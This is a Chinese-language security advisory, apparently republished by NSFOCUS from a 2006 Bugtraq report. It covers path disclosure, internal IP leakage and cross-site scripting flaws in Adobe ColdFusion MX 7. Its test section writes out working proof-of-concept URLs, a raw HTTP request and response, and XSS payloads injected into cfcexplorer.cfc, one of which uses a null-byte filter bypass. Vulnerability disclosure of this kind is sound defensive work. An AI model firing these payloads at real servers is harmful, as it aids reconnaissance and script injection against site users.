安全研究

安全漏洞
ColdFusion MX7多个信息泄露及跨站脚本漏洞

发布日期:2006-12-11
更新日期:2006-12-12

受影响系统:
Adobe ColdFusion MX 7.00
描述:
BUGTRAQ  ID: 21532

ColdFusion MX是一款高效的网络应用服务器开发环境,具有很高的易用性和开发效率,基于标准的Java技术,可以与XML、Web Services和Microsoft.NET环境相集成。

ColdFusion在处理用户请求时存在多个安全漏洞,远程攻击者可能利用这些漏洞获取服务器相关的敏感信息。

如果远程攻击者能够向ColdFusion提交以以下格式结束的无效请求的话,就会导致在返回结果中泄漏服务器路径:

    /.jws
    /.cfm
    /.cfml
    /.cfc

如果未经提供主机便请求了/CFIDE/administrator/login.cfm页面的话,就会导致在href标签中泄漏服务器的内部IP地址。

此外,如果能够提交恶意的URL请求的话,还可以执行跨站脚本攻击。

<*来源:Brett Moore (brett.moore@SECURITY-ASSESSMENT.COM
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=116585681932405&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

泄漏服务器路径:

http://serverip/page1.htm/a.cfm
http://serverip/CFIDE/administrator/analyzer/img/minus.gif/a.cfm
http://serverip/jrunscripts/jrun.ini/a.cfm
http://serverip/jrunscripts/jrunserver.store/a.cfm
http://serverip/jrunscripts/readme.txt/a.cfm

上述请求会返回类似于以下的结果:

    Error parsing the Tag Library Descriptor
    file:/d:/sekretpath/hidden/page1.htm/..

泄漏内部IP地址:

------------------------------------------------------------------
GET /CFIDE/administrator/login.cfm HTTP/1.0


HTTP/1.1 200 OK
Server: Microsoft-IIS/5.1
Date: Thu, 09 Nov 2006 05:44:02 GMT

<html>
<head>
<LINK REL="SHORTCUT ICON"
  href="http://INTERNALADDRESS:80/CFIDE/administrator/favicon.ico">

------------------------------------------------------------------

跨站脚本:

http://server/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtmtestl&name=CFIDE.adminapi.administrator&path=/cfide/adminapi/administrator.cfctest"><script>alert()</script>

如果能在<script>注入%00的话,就可以对Internet Explorer用户执行跨站脚本攻击。

http://server/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtmtestl&name=CFIDE.adminapi.administrator&path=/cfide/adminapi/administrator.cfctest"><%00script>alert(document.domain)</script>

建议:
厂商补丁:

Adobe
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.adobe.com

浏览次数:3073
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障